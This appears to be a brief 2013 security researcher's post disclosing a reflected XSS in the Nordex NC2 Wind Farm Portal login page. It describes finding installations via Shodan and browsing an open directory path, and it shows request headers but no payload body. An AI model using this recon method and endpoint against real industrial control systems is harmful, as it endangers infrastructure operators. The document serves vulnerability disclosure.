Nordex NC2 Wind Farm Portal Reflected XSS

October 18, 2013

Another saved Shodan search this one for Nordex NC2 Wind Farm Portal software. Copied some of the software (version 11.06.11) over due to it allowing open directory browsing (go to /1_07_00/nc2/program_en/ for example) and checked for issues:

POST /login HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 129
Content-Type: application/x-www-form-urlencoded



update: ICS-VU-308064